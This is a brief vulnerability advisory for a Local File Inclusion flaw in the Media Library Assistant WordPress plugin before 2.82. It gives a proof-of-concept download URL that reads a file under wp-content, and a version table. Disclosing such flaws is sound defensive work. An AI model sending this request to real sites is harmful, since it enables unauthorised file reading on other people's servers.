The Media Library Assistant plugin before 2.82 for WordPress suffers from a Local File Inclusion vulnerability in mla_gallery link=download.
The LFI is restricted to the “wp-content” directory. http://www.example.com/wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php?mla_download_type=text/htl&mla;_download_file=/app/public/wp-content/plugins/index.php
CPE | Name | Operator | Version |
---|---|---|---|
media-library-assistant | lt | 2.82 |